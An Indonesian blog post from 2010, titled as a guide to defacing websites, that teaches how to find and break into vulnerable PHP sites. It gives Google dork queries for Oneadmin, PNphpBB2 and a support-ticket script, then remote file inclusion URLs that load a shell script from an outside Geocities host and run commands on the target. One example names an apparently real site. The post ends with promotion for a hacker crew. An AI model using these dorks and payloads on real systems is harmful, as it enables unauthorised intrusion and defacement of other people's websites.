Senin, 04 Januari 2010
hacking : Cara Deface
Saya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface..
Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau kesalahan kesalahan yang terdapat pada Script atau Link nya..
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk
tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
- Oneadmin
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki...
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname%20-a;cd;pwd
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al
Kunjungi WEb site kami Di www.bali-source.net
#kudushacker Crew
Join My Channel at #kudushackerlink Mirc.dal.net
jun - kudushackerlink.net-From DalNet
Langganan:
Postingan (Atom)